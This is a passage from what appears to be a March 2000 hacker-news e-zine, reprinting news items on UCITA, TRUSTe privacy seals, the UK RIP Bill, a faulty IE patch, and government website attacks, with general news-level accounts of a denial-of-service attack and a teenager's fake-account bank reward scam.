For example, the owners will be able to change the software license at any time, restricting what you are allowed to do with a program. They will be able to send you e-mail containing new conditions, and these new conditions will be legally binding on you even if you never actually got the mail. If you do see the mail and you reject the new conditions, they will be able to demand that you stop using the program -- and even send your machine a message across the network to turn off the program without a moment's notice.

ZDNet: If there is so much opposition, why has the BSA, and others, had so much success in pushing the bill through?

Stallman: As far as I know, they have succeeded in one state. The term "so much success" seems to be an exaggeration. I don't know why they succeeded in Virginia; I can only guess. But here are some things, which are not unusual, which may have happened this time:

1. The supporters of UCITA probably are better organized and have more money to contribute to election campaigns.

2. The legislators probably have not actually read UCITA, and that enabled supporters of UCITA to mislead them about both what UCITA would do and why people oppose it.

3. The supporters of UCITA probably told the legislators ... that if Virginia passes UCITA and other states do not, some software companies will move to Virginia. State legislators and governors often give an unreasonable amount of emphasis to winning business to their states from other states. They often do this without regard to whether the country as a whole will benefit or suffer as a result. Business often uses this to manipulate states, to play one state against another, to get what it wants.

The joke, though, is on them, because only retail Internet sites would move to Virginia, and the total employment of these sites would be insignificant. The software development will remain where it is, in California, Washington, Bangalore or wherever.
(Sorry about formatting, couldn't be bothered to pretty it up ... - Ed)

@HWA

23.0 HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The industry trade group TRUSTe was formed in an effort at self regulation and to help fend off unwanted legislation. Are they really doing the public a service? An interview with TRUSTe CEO Bob Lewin details how even sites selling personal data can acquire the privacy seal of approval.

Salon
http://www.salon.com/tech/view/2000/03/13/truste/index.html

The privacy police?

TRUSTe CEO Bob Lewin explains how even sites selling personal data can get the nonprofit's privacy seal of approval.

- - - - - - - - - - - -

By Lydia Lee

March 13, 2000 | When TRUSTe launched in 1996, the nonprofit promised to help the Internet industry regulate itself with regard to protecting surfers' privacy. Over the past three years, it has vetted the privacy policies of over 1,300 sites, and its black-and-green logo, which signals to visitors that a site actually abides by its policies, can be found on most major e-commerce sites.

But what kind of teeth does the organization really have? TRUSTe didn't look so trusty last year when a security expert found that its licensee RealNetworks had been collecting user information on the sly. Instead of reprimanding the company, the nonprofit argued that because RealNetworks' privacy violations took place via its RealJukebox software, not its Web site, the incident was outside the purview of TRUSTe.

More recently, it's been other privacy advocacy groups like JunkBusters that have alerted the public to privacy violations such as Intel's decision to include an identifier in its Pentium III chip; JunkBusters also started a campaign against DoubleClick's acquisition of Abacus when it was announced last June.
But Bob Lewin, executive director and CEO of TRUSTe, says the group's privacy seal program plays an important role in enforcing privacy policies. Previously, Lewin was vice president of marketing at networking software company ISOCOR and before that at the open systems consortium X/Open Company. Now he heads up this nonprofit that charges between $300 and $4,999 to certify an e-commerce site's privacy practices.

Salon: What's the basic message you're giving to consumers when they see the TRUSTe symbol? Is it that the site isn't going to sell my data?

Lewin: The bottom line is that this site adheres to the fair information practices -- 1) that they are disclosing what information they're collecting, why and if they're sharing that information with somebody; 2) that they're giving the visitor the choice -- whether to allow that to happen; 3) that once the information is collected, they will use reasonable security to protect that information; 4) that they allow the consumer reasonable access to that information to modify it.

Salon: So if I were collecting consumers' e-mail addresses and then selling them to a direct-marketing company, would I still be able to get the TRUSTe symbol?

Lewin: Only if you stated that to the consumer in your privacy statement. If somebody came to us and said, "Here's our privacy statement. We will collect the e-mail addresses, and it's our intent to sell or share this information with these third parties, and we are giving you the option to say yes or no to this." Then that site could become a TRUSTe licensee.

Salon: What percentage of sites get rejected?

Lewin: It's not a large percentage -- I'd guess 1 to 2 percent.

Salon: What's the major reason sites get rejected?

Lewin: Once they start through the process, they can't or will not meet the requirements of the program. Say they'd like to be able to share info with a subsidiary, and we say, "That's to a third party, you have to disclose that." Well, they may voluntarily decide they're not going to proceed.
Also, we don't apply our mark to gambling sites, since it's illegal in some states. The other reason that it happens, frankly, is that 85 percent of our sites are very small -- $10 million and below -- and as the process starts, the company goes out of business.

Salon: If DoubleClick had been a TRUSTe member, would its decision to combine its database of anonymous surfing habits with an acquired database of personal information have set off red flags for you?

Lewin: There would be some issues. That's why we formed a third-party ad server committee, to get all the technical and legal issues out on the table. They would have had to inform us before they changed their policy, and we would have had some discussions.

Salon: Once it has the TRUSTe seal, have you ever kicked out a site for doing something?

Lewin: No, we've come very close, but we haven't had to do it. The escalation process is as follows: We get a complaint from a consumer about a licensee, and once we are assured that the consumer had previously contacted the Web site to try and get it resolved -- because a lot of these are just misunderstandings -- we then contact the Web site and investigate and find out indeed if there's a real issue here. Now, the resolution to this may result in a change in the privacy policy, the business model, or what have you.

Salon: Shouldn't you have caught that kind of stuff when you reviewed the policy in the first place?

Lewin: Well yes, but the nature of the beast is that all of this is software. What is generally the case is that there's been some unplanned feature in the software. Something will happen -- not that somebody wanted to do it, but the software allowed them to do it. So, when it happens, you point it out, it gets fixed and it's over.

Salon: But that shouldn't mean they need to change their privacy policy, should it?

Lewin: It could be just a software change, but it could be a policy change.
Let's say you implement software that shares information, or decide to collect more info than you originally stated -- perhaps you're collecting IP addresses, or disseminating cookies. So you have to change your policy. This whole thing is not a static field. We do constant monitoring, but many of our licensees will communicate with us, and in fact one-third of our efforts is focused on working with them. As their Web sites evolve, we've got to ensure that the privacy statement evolves. It's an ongoing process.

Salon: Would it be incumbent on the company to notify all the users who had seen the previous privacy policy?

Lewin: If they start collecting new information, then at that point in time, they have to communicate to users from this point forward, "We are also doing this." So that has to be stated clearly in the privacy statement. It would not impact people from beforehand because that information was not being collected.

Salon: But what if the people from beforehand come back and then they don't read the privacy policy? Is there anything in the TRUSTe program that says if you are instituting a new privacy policy, you have to let all the consumers from before know that?

Lewin: Well, we can't force consumers to read privacy statements, but in all our consumer outreach programs, we tell people: Even if you've visited this site before -- because things change -- the first thing to do is go to the privacy statement and review it to make sure there have been no changes. And we encourage licensees to put any changes up at the front. This is easier said than done -- none of us like to read pages and pages of text.

Salon: Have you ever blown the whistle on a company?

Lewin: Yes, there are instances -- most of the problems are not with malice aforethought. The major monitoring is by consumers themselves, but we have people who look at the sites every quarter, to see if there've been any changes on the site.
We also enter in names that we make up, opt-in in some cases and opt-out in others, so if we get communication to a name then we know where it came from.

Salon: What role should the government have in enforcing online privacy?

Lewin: They play a very important role now, because they conduct studies on whether improvement has occurred within the industry -- the number of privacy statements, the quality of privacy statements. I think the government has clearly stated that certainly in the health-care and financial area, they feel the need to have some kind of legislation. They also did that for children -- the Children's Online Privacy Protection Act. They've said that because this is super-sensitive information, you should have some guidelines. Now, the question becomes, what vehicle do you use to enforce that legislation, which is equally important. We feel that seal programs -- and in particular, TRUSTe -- play a very important part there. COPPA is going into law April 21, and our contract will contain the elements for Web sites to adhere to COPPA requirements.

Salon: But it seems like a lot for any one company to keep up with. With all these violations going on, it seems like there needs to be a more watchful eye.

Lewin: I would say that there is a watchful eye, if people look at the facts versus hype from some advocacy groups. It's all very well to run around screaming and yelling, "The sky is falling, the sky is falling," but the fact is, many of these issues that have come up are evolutions that occur in business models on the site. I would argue that the industry has demonstrated very quick response when those problems come up. Take RealNetworks. The issue there occurred outside the scope of the current TRUSTe program. Yes, RealNetworks is a TRUSTe licensee, but this particular issue had nothing to do with the collection of personal information on the Web site; it had to do with the collection of user information using software servers.
Now, within a week, even though it was outside the program, we announced the formation of a pilot to evolve our program to handle those situations. I defy any government agency to do that.

Salon: But customers aren't thinking, when they see the TRUSTe symbol, that it only covers the Web site. Maybe from the technical view it's different, but the consumer isn't going to make the distinction. Does the TRUSTe program cover both now?

Lewin: Yes, we need to do a better job so the consumer intuitively knows what the TRUSTe logo stands for. Ultimately, it would be great -- as we lay out the software privacy program -- to blend the two programs together. Or there may be a TRUSTe symbol for sites and one for software.

Salon: What privacy issues are you trying to anticipate?

Lewin: One thing we're looking at is the wireless world, where we start talking about palm-held things and hand-held things and phones. I think there are some issues there we haven't fully addressed yet. We need to add more meat to the term "reasonable security." Today, that's the best term people have, because it can vary so much depending on the application and the technology. As we put more and more of these things into people's hands, we have to worry about how we prove that the person holding it is indeed the proper owner.

salon.com | March 13, 2000

- - - - - - - - - - - -

About the writer
Lydia Lee is an associate editor for Salon Technology.

@HWA

24.0 HNN:Mar 15th:UCITA Signed By Governor in Virginia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by techs

Set to take effect in July 2001, the Uniform Computer Information Transaction Act has been signed into law in Virginia by Governor James S. Gilmore III. UCITA will allow software companies to remotely disable software and will give licensing agreements the force of law.
Washington Post
http://www.washingtonpost.com/wp-dyn/articles/A6866-2000Mar14.html

Computer World
http://www.computerworld.com/home/print.nsf/all/000314F772

Post;

Gilmore Signs 1st Internet Commercial Code Into Law

By Craig Timberg
Washington Post Staff Writer
Tuesday, March 14, 2000; 1:00 PM

Virginia Gov. James S. Gilmore III signed the nation's first set of contractual rules specifically governing electronic commerce into law today on the second day of an Internet summit at George Mason University.

The Uniform Computer Information Transaction Act, which is typically called by its initials "UCITA," overwhelmingly passed the General Assembly during the just-finished legislative session despite the opposition of critics who contended it would erode basic consumer rights. Because of that continuing debate, the law will not take effect until July 2001 while lawmakers study the fine print.

Supporters such as Gilmore (R) say UCITA mainly updates for the Information Age the commercial codes that states passed decades ago. UCITA essentially gives the force of law to software licensing agreements as soon as a consumer rips the shrink-wrap off the box or hits the "I Accept" button on a program downloaded from the Internet.

"UCITA provides clarity to contract law where none existed before, which will make it easier for consumers and industries to conduct transactions via the Internet," Gilmore said in a statement. "This increase in electronic transactions will perpetuate the Internet revolution, promote e-commerce and foster the growth of Virginia's technology and manufacturing economies."

State officials hope that by becoming the first state to adopt UCITA, Virginia will further its reputation as a center of high-technology and attract more businesses to the state.

But consumer advocates warn that in the rush to adopt UCITA, Virginia overlooked concerns that have caused two dozen attorneys general around the country, including Maryland's J. Joseph Curran Jr. (D), to write a letter voicing concerns.

Consumer groups warn that UCITA will give software companies new power to disable or "repossess" their products if they believe they are being used in a way that violates the licensing agreement. Another worry, say consumer advocates, is that buyers won't always know the details of the licensing agreements until after the purchase is made.

"The whole idea of informed shopping is based on disclosure before purchase," said Jean Ann Fox of the Virginia Citizens Consumer Council, which lobbied against the bill.

The signing took place at The 2000 Global Internet Summit at George Mason's campus in Fairfax.

(c) 2000 The Washington Post Company

-=-

Computer World;

Va. governor signs UCITA legislation into law

By Patrick Thibodeau
03/14/2000

Fairfax, Va. — Flanked by the chairman of one of the state's largest businesses — America Online Inc.'s Steve Case — Virginia Gov. James Gilmore today signed the Uniform Computer Information Transactions Act (UCITA) into law. But the bill won't take effect until July 2001, giving people and businesses with concerns about UCITA time to seek legislative amendments, the governor said.

"We're not deaf to people's concerns," said Gilmore. Still, Gilmore said he doesn't believe those concerns were "legitimate impediments" to the state's adoption of the legislation.

The one-year delay for adoption came at the behest of a coalition of some of the state's largest nontechnology companies, who believe UCITA gives software vendors the upper hand in software licensing.

"If there's any sense that things may not be quite right, there is plenty of time for people to come in under Virginia's approach and have a chance to do some amendments," said Gilmore. The state plans to create a study committee to examine the issues raised by the business coalition that sought to delay the law's implementation.

UCITA sets a series of default rules governing commercial software transactions.
One of its most controversial provisions would allow a software vendor to automatically disable software in a contract dispute. Case praised Virginia's action and said he hoped "other states will look at this and learn from this and embrace it." Virginia is moving quickly on UCITA to help create an attractive climate for its technology businesses. For UCITA to become the law of the land, technically it must be adopted by 50 states. But companies may nonetheless cite UCITA in their license agreements. "If Virginia remains the only state that adopts this, then I believe that the certainty of our (actions) would attract additional businesses into the commonwealth," said Gilmore. Maryland is also actively considering the legislation. @HWA 25.0 HNN:Mar 15th:RIP Goes Before Commons Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lady Sharrow The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law. The bill will force ISPs to have the facilities to log and monitor all online activities of their users. The Register UK http://www.theregister.co.uk/000314-000016.html Posted 14/03/2000 11:37am by Sean Fleming What the hell is... the UK's RIP Bill The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law. But with 30 amendments tabled against it and an angry mob of opponents waiting to string it up, RIP has become better known for the widespread - and some might say kneejerk - reaction people have had to it, rather than for its aims and content. Civil liberties groups, individual Net users and politicians from all the major UK parties are banding together to decry what is being labelled a Snoopers Charter. But just what is all the fuss about? 
The Blair administration has been slammed by many for its cronyism and control freakery, so is this just another example of Big Brother Blair wanting to watch over you at all times?

Growing pains

To become an accepted part of everyday life, and not just the place to go for cyberporn, e-fraud and to pick up your email, the Internet will have to appeal to a broader cross-section of the general public. Ecommerce, for example, will never thrive in a world where the majority of potential users and customers are too scared to part with their credit card details in case they get ripped off.

The not-so-wired public need to feel confident about the Internet. This is all part of the natural evolution that all things go through when they achieve popularity. The days of the WWW Wild West are numbered.

So, what does the Bill propose and why are so many people objecting to it? The Bill describes itself as:

"A Bill to make provision for and about the interception of communications, the acquisition and disclosure of data relating to communications, the carrying out of surveillance, the use of covert human intelligence sources and the acquisition of the means by which electronic data protected by encryption or passwords may be decrypted or accessed; to provide for the establishment of a tribunal with jurisdiction in relation to those matters, to entries on and interferences with property or with wireless telegraphy and to the carrying out of their functions by the Security Service, the Secret Intelligence Service and the Government Communications Headquarters; and for connected purposes."

Lots of spooky terms in there - "covert human intelligence sources" translates as spies - but in essence this is all about setting down a legal framework within which electronic communications are treated no differently from telephone tapping and intercepting mail (as in the paper stuff).

Some people will throw their hands in the air at the very thought of any of this, but cracking down on the illegal use of the Internet by terrorists, perverts and organised criminals may be considered by many to be A Good Thing.

One size fits all

However, the Bill falls down - and in a big way - in the details. Or lack of them. It is vague on practicalities, and how permission to access private communication will be granted.

ISPs will be obliged by law to have the facilities to log and monitor all the online activities of their users. But the Bill doesn't specify how this will be done. And while there is talk of the Government reimbursing hardware costs with regard to monitoring, it doesn't make provision for the massive increase in overheads this will bring.

The Bill is also very vague in parts and can be interpreted in such a way that much of it becomes nonsensical. For example, it defines who will be covered by the Bill when it becomes law:

a) a person who provides a postal service, or
b) a person who provides a public telecommunications service, or
c) a person not falling within paragraph b) who has control of the whole or any part of a telecommunications system located wholly or partly in the UK.

ISPs, mobile phone companies, WAP service providers, news servers and so on all fall under the term "telecommunications service". Look at that definition again - it could mean anyone.

One of the Bill's fiercest critics is the organisation Stand. This is what Stand has to say on this point: "You're no longer using an ISP to connect to the Net. You're using the ISP's public telecommunication system."

The Bill also makes it an offence for you to be told that a surveillance warrant has ever been issued against you. That offence exists in perpetuity - there is no expiry date, you can never be told. And should anyone ever tell you, they risk a prison sentence.

Someone to watch over me

Ah yes, you may be thinking, I live in a liberal democracy - the security forces can't just go round snooping on people willy nilly. Well, guess again. Here's what the Bill says about surveillance warrants. There are four main justifications given by the bill for issuing a warrant:

a) national security interests,
b) to prevent or detect serious crime,
c) to safeguard the UK's economic well being,
d) for the purpose, in circumstances appearing to the Secretary of State to be equivalent to those in which he would issue a warrant by virtue of paragraph (b), of giving effect to the provisions of any international mutual assistance agreement.

And there's a list as long as your arm of those people who can issue the warrant against you - from senior police officers to "any such other persons as the Secretary of State may by order designate".

Reading between the lines, the Bill says that the Home Secretary can - for any reason - issue a warrant against anyone, and that anyone with the Home Secretary's permission can do likewise. Don't forget, you'll never know if information has been gathered about you, what it was used for and so on.

Taking Liberties

As it stands, reader Simon Batistoni writes, the RIP Bill contains one truly frightening basic assumption: if you have stored on your computer any form of encrypted message, you will be forced on request by the police to hand over the necessary keys to decrypt this data. If you do not have the keys, YOU MUST PROVE THAT YOU HAVE NEVER BEEN IN POSSESSION OF THEM, or you could be subject to a two-year jail term.

The principle of the police being able to view encrypted data, so that they can nail paedophiles, drug dealers, etc, has some genuine merits. The flaw in this measure, however, is that the recipient/possessor of encrypted data is guilty until proven innocent, something which destroys the entire foundation of our legal system. What's more, it is impossible to prove that you never had something.

As it stands, the measures in the Bill could be applied to a PGP-encrypted signature on an email, currently used by many as a reliable means of identity verification. Theoretically, the innocent father of a suspect under surveillance, who receives an email from his son containing the standard encrypted signature, could fall under the scope of this RIP Bill; he could be jailed for failing to reveal the contents of the encrypted data.

Ostriches need not apply

Small wonder that there is so much opposition to the Bill. There are many more examples of the above thinking running throughout the Bill, such as the loophole that could mean you have to keep tabs on yourself but can never let yourself know, otherwise you end up in prison.

Stand has done a much more comprehensive job of examining RIP than The Register is able to do and its site is well worth a visit.

Don't be fooled into thinking that your Government will always have your best interests at heart, because that's not the way of Governments. But at the same time, don't assume that any attempt to regulate the Internet is an invasion of rights and freedoms - freedom without responsibility is, after all, little more than latent tyranny.

We will all be affected by the RIP Bill when it becomes law - as it almost certainly will, in some form or another - so now is the time to find out a little more about it and decide where you stand, because in another six months it could all be too late. ®

@HWA

26.0 HNN:Mar 15th:Security Patch Locks Out Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

A 128-bit security patch for Internet Explorer 5.0, 5.0a, and 5.0b released by Microsoft will replace security files with older versions that will lock users out of their systems after restart. Microsoft has asked administrators to stop distributing the patch and has said that a fix will be available soon.
InfoWorld
http://www.infoworld.com/articles/en/xml/00/03/14/000314enpatch.xml

IE5/Windows 2000 security patch can lock out users
By Cynthia Morgan, Computerworld

MICROSOFT WARNED NETWORK administrators on Monday to stop distributing a security patch for Internet Explorer 5.0 that could prevent Windows 2000 users from logging in to their computers.

Instructions included with the patch, a 128-bit security add-on for Internet Explorer 5.0, 5.0a, and 5.0b versions, are incorrect, said a Microsoft spokesman. The error, a command-line "switch," causes an automated installation to replace security files with older versions that will lock users out of their systems after restart.

The 128-bit security installations under Windows 9x and Windows NT 4.x are not affected, the spokesman added.

Administrators who have built automated installation packages for Internet Explorer 5.0 on Windows 2000 systems should check the Microsoft site for information on correcting the problem. Meanwhile, installation packages containing the faulty switch should be frozen immediately.

A Microsoft KnowledgeBase bulletin (#Q255669) with complete instructions and updates should be available at search.support.microsoft.com/kb within 24 hours, the spokesman said.

Microsoft Corp., in Redmond, Wash., is at www.microsoft.com

For more enterprise computing news, go to www.computerworld.com.

Copyright (C) 2000 Computerworld, Inc. All rights reserved.

@HWA

27.0 HNN:Mar 15th:DNA Used for Steganography
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dan

17-year-old Romanian-born Viviana Risca topped the 59th Intel Science Talent Search competition by embedding a computer message in the gene sequence of a strand of DNA using steganography, a data encryption technology that allows a computer user to hide a file within another file.

San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/merc/docs/013955.htm

Posted at 7:51 a.m. PST Tuesday, March 14, 2000

New York teen-ager wins $100,000 with encryption research

WASHINGTON (AP) -- A 17-year-old Romanian-born girl who embedded a computer message in the gene sequence of a strand of DNA has been named the best young scientist in the country.

Viviana Risca, a senior at Paul D. Schreiber High School in Port Washington, N.Y., won a $100,000 college scholarship when she bested 10 other high school seniors on Monday in the 59th Intel Science Talent Search competition.

Risca said her project in steganography, a data encryption technology that allows a computer user to hide a file within another file, was a simple one. Risca, who emigrated from Romania eight years ago, embedded the secret message ``June 6 Invasion: Normandy.''

Technologies like steganography can protect sensitive electronic information from interception or eavesdropping, but they can also wreak havoc if used by terrorists and criminals.

Formerly known as the Westinghouse Science Talent Search, the contest has been nicknamed the ``Junior Nobel Prize.'' Past winners include five Nobel laureates, nine MacArthur Foundation fellows and two Fields medalists. Forty finalists came here to compete for the award.

Jayce Getz, a senior at Big Sky High School in Missoula, Mont., won second prize and a $75,000 scholarship for a math project on partition function. And Feng Zhang, a senior at Theodore Roosevelt High School in Des Moines, Iowa, won third prize and a $50,000 scholarship for a biochemistry project in molecular virology.

The other winners in the top 10, their schools, the amounts of their scholarships and their projects were:

- Alexander Schwartz, Radnor (Pa.) High School, $25,000, abstract algebra concerning Abelian groups;
- Eugene Simuni, 18, Midwood High School in Brooklyn, N.Y., $25,000, a biochemistry project that investigated G proteins;
- Matthew Reece, duPont Manual Magnet High School, Louisville, Ky., $25,000, a proposal on fluid dynamics problems;
- Kerry Ann Geiler, 17, Massapequa (N.Y.) High School, $20,000 for a project on communication by ants;
- Elizabeth Williams, Palos Verdes Peninsula High School, Rolling Hills Estates, Calif., $20,000, perception of light and shape by the brain;
- Zachary Cohn, 17, Half Hollow Hills East High School in Dix Hills, N.Y., $20,000 for a study of perfect squares;
- Bob Cherng, Troy High School, Fullerton, Calif., $20,000, the transition of ammonia and hydrogen halide into ammonium halide.

The other 30 finalists received $5,000 scholarships.

@HWA

28.0 HNN:Mar 15th:Bugging SAT Phones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Odin

A lot of people have turned to satellite phones as a last ditch effort to retain some privacy. Now Motorola has patented a means by which to listen in to a satellite phone to satellite phone call.

New Scientist
http://www.newscientist.com/news/news_222923.html

(sorry: 404! - Ed)

@HWA

29.0 HNN:Mar 15th:More and more EZines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by L33t Dawg

New issues of several e-zines have been released including Hack In The Box Issue #3, HWA Haxor news #51 and Datacore has released DataZine 0.02.

Hack In The Box Issue #3
http://www.hackinthebox.org

HWA.hax0r.news
You're here already :-)

DataZine .02
http://www.tdcore.com/index2.html

@HWA

30.0 HNN:Mar 16th:Army on Alert Over CyberAttack Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The Army has placed all of its worldwide cyber defense teams on full alert after learning of a threat from a group known as The Boys From Brazil.
The group has threatened to deface the army.mil home page. The Army has said that it is aware of the group's attack profile, and is prepared for any attack against the Army's Web site, and that they have enacted additional 'countermeasures' to protect the site. (Is there really a threat? Who knows, but this sounds like one hell of a publicity stunt.)

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0313/web-armyhac-03-15-00.asp

Army on hacker alert
BY Dan Verton
Updated 03/16/2000 at 17:05 EST

HOUSTON — The Army has placed its cyberdefense teams on full alert after a known hacker group threatened to take down the Army's World Wide Web home page this Friday.

On Tuesday evening the Army placed its cyberdefenders at the Land Information Warfare center at Fort Belvoir, Va., on full alert after a group known as the Boys from Brazil threatened to hack into the Army home page on Friday. But today the Army clarified that the hacker group it is watching is Hacking for Girliez, which took down the New York Times' site in September 1998.

Most of the hackers' remarks appeared in comment tags, which can be seen in source material but not on a Web page. The tags include such remarks as "'Immature kids' were able to bypass...$25,000 firewalls [and] bypass the security put there."

Philip Loranger, chief of the Command and Control Protect Division in the Army's Information Assurance Office, speaking here at the 2000 Army Directors of Information Management Conference, said the Army is prepared for any attack against its Web site.

"We've had to activate some countermeasures to protect the Army home page," Loranger said, declining to provide specifics for security reasons. However, he said the countermeasures being put in place do not include disconnecting the Army site from the Internet.

Specific details emerged today on some of the steps the Army has taken in the past few months to prepare for these types of attacks. Lt. Col. James Withers, a systems engineering specialist with the Army signal command, said the Army's regional CERTs have written special software scripts that will help defend against known hacker tactics. The Army also developed Web cache proxy servers that divert Web surfers away from primary servers residing behind firewalls on Army installations.

The Army is also in the process of deploying a protected domain name system architecture that will help the service regain control of all Army Internet sites and network entry points. "We know the hackers mapped [the old architecture]," Withers said, adding that 90 percent of the Army's global protected DNS architecture should be completed by April.

Loranger demonstrated for conference attendees how simple it is for hackers to exploit known operating system vulnerabilities using widely available hacker tools and standard systems administrator procedures. In fact, Loranger, with the approval of the Army's staff counsel, demonstrated a live hacking of another computer system to show how within minutes hackers can crack into known password vulnerabilities and take over entire systems and networks.

Loranger also said that the lack of international laws governing conduct on the Internet poses real obstacles to the government's ability to respond to foreign-based hacker attacks. Loranger pointed out that some graduate-level computer education schools in India, for example, have established hacking into U.S. government systems as an academic requirement.

Lt. Col. LeRoy Lundgren, program manager for the Army's National Security Improvement Program, said as many as 285,000 network queries were denied by Army security systems last year because of the questionable method used. Lundgren added that the Army has seen an increase in the number of queries originating in foreign countries, particularly China and Bulgaria.

@HWA

31.0 HNN:Mar 16th:NASA Fears CyberAttack From Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

NASA's Jet Propulsion Laboratory has blocked all access to its web site from addresses originating in Brazil due to fears of a cyber attack. JPL spokespeople said that access would be restored once additional security measures were in place. (How does blocking one country affect anything?)

Newsbytes
http://www.newsbytes.com/pubNews/00/145708.html

NASA Division Battles The Hack From Ipanema
By Robert MacMillan, Newsbytes

WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15 PM CST

From Antonio Carlos Jobim to the samba, the US generally has welcomed some of the cooler cultural exports from Brazil, but the latest one - a series of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the agency bossa nova-ing its way toward beefing up its security measures.

JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that the agency has shut down access to queries emanating from Brazil until the agency's security team makes some necessary improvements to its network.

O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as earlier reports indicated.

"There was a number of recent attacks on JPL hosts originating from various sites in Brazil, and as a temporary move while our computer security people work, we're blocking network access to JPL from Brazil," O'Donnell said. "But this is a temporary thing."

He said normal service to South America's largest nation would return "in a matter of days at most." He added that he is "not aware of any (security) compromises per se in these attacks."

Highly secure data at JPL generally is not stored on hosts that are connected to the Internet, O'Donnell also said, but added that he could "not go into a great deal of detail" on what kind of information was sought.
MSNBC reported the Brazil problem after a network analyst at the Bank of Brazil in Brasilia reported that he could not access the JPL site.

The service also reported that a CERT official at its headquarters in Pittsburgh, Pa., said that blocking access to an entire network or country is reasonably common, though the official said that with spoofing attacks - when the address of the attacking e-mail in a denial of service attack is falsified - blocking against a particular domain or country code becomes largely ineffective.

O'Donnell said that CERT and the JPL have been working jointly on security issues.

Reported by Newsbytes.com, http://www.newsbytes.com .

13:15 CST

@HWA

32.0 HNN:Mar 16th:FBI Site Hit by DOS Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

Just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" to its web site it was hit with a denial of service attack. The attack forced the web site offline for several hours.

UPI - via Virtual New York
http://www.vny.com/cf/News/upidetail.cfm?QID=71527

FBI Web site attacked
Wednesday, 15 March 2000 15:15 (ET)

FBI Web site attacked
By MICHAEL KIRKLAND

WASHINGTON, March 15 (UPI) -- There has been another "denial of service" cyber-attack against a high-profile Web site, sources told UPI Wednesday -- this time the target was the FBI's own Web page, which was taken out of action for several hours Tuesday.

The attack hit just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" list, which was celebrated Tuesday at the bureau with the opening of a permanent headquarters exhibit.

A "denial of service" attack overwhelms a Web site with requests for information, but with "spoofed" -- fabricated -- return e-mail addresses. A site tries to endlessly answer the requests, and in effect ties itself in knots until it shuts down.

There was no indication yet on whether Tuesday's cyber-attack was a "distributed" denial of service attack, similar to those launched against major commercial sites on the Internet early last month. Those attacks temporarily crippled Yahoo!, E-Trade, CNN.com and others. U.S. investigators were still pursuing leads on the latest attack Wednesday, defining its nature.

A "distributed" attack is one which uses "innocent" third-party computer systems. Illegal hackers, called "crackers," usually find the attack software "tools" available "in the wild" on the Internet.

The "distributed denial of service," or DDOS, tools enable a cracker to break into an unsuspecting computer system and implant "packets" or "daemons" that will cause the system to launch an attack against a target unless detected and disabled in time. Literally hundreds of "zombie" computer systems can be infected, without their operators' knowledge, and can launch a simultaneous attack.

The FBI is still searching for at least two unnamed suspects in February's attacks. Much of the search has been concentrated in Canada with the help of the Royal Canadian Mounted Police. Agents are also concentrating on Germany, where the DDOS "tools" may have originated, though Germany is not believed to be the country of origin for the actual attacks.

There was no immediate indication Wednesday that the attack on the FBI site came from the same suspects wanted for the attacks on the commercial sites.

--
Copyright 2000 by United Press International. All rights reserved.

@HWA

33.0 HNN:Mar 16th:Teenager Arrested in Online Bank Scam
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Someone has finally been arrested in a scam that has been circling around the Internet for months. Various online banks offer cash rewards just for opening an account. The scam works by opening several accounts under false names and then transferring the free money from each account into a real account. A 14 year old student at Thomas Jefferson Middle School in Jefferson City, Missouri was able to amass over $2000. The scam was uncovered by a postal worker after he started delivering 'bushels' of mail to an address owned by the kid's father. (Discovered by a postal worker?)

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/03/15/netbanker0315_01.html

Teen Busted in Internet Banking Scam
120 Fake Accounts Yielded $2,000 in Rewards
March 15, 2000
By Carol Huang

JEFFERSON CITY, Mo. (APBnews.com) -- An eighth-grader in rural Missouri signed up for more than 120 fake bank accounts through the Internet to rake in a total of $2,000 in new customer cash rewards, authorities said today.

"He didn't realize the gravity of what he was doing, but he knew it was wrong and that it wasn't his money," said Cole County Sheriff John Hemeyer.

Hemeyer said the boy, 14, a student at Thomas Jefferson Middle School, had been helping his father, a self-employed construction contractor, enter business records onto a computer when he found an Internet site offering an opportunity to open a bank account.

Eventually, the teen had more than 120 accounts at banks around the country, each under a name generated by his computer, and had transferred more than $2,000 in cash freebies into a real account of his own.

Puzzled postal worker

A puzzled postal worker reported delivering "bushels of baskets of mail" to a vacant trailer on a plot of land, and investigating deputies went to the boy's father, who owns the land.

Besides entering the teen into the juvenile court system, deputies confiscated his computer, which he had upgraded using the cash rewards, Hemeyer said.

